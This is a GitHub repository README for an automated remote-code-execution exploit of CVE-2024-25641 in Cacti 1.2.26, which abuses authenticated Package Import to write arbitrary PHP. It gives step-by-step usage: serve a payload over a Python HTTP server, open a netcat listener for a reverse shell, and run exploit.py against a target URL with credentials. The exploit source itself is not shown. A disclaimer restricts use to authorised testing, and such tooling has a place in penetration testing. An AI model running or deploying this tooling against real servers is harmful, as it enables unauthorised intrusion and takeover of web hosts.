Skip to content

thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

Fully automated exploit for CVE-2024-25641. When a user is authenticated, Cacti version 1.2.26 is vulnerable to an arbitrary file write vulnerability, exploitable through the "Package Import" feature, allows authenticated users having the "Import Templates" permission to execute arbitrary PHP code on the web server (RCE).

Credits to this PoC : https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88 (I have simply automated this to gain a foothold.)

DISCLAIMER

This tool is intended for educational and testing purposes only. The author of this tool is not responsible for any misuse or illegal activities performed with it. Use this tool only on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal and unethical.

Example of Use

# Clone the repository
git clone https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26.git
cd CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

# Setup Python web server
python -m http.server <PYTHON_WEB_SERVER_PORT>

# Setup netcat listener
nc -lvnp <LOCAL_PORT>

# Run the tool
pip install -r requirements.txt (if needed)
python exploit.py -L <LOCAL_IP> -lp <LOCAL_PORT> -wp <PYTHON_WEB_SERVER_PORT> -url <URL> -u <USER> -p <PASS>

You can also check this out : CVE-2024-25641 PoC

About

CVE-2024-25641 - RCE Automated Exploit - Cacti 1.2.26

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages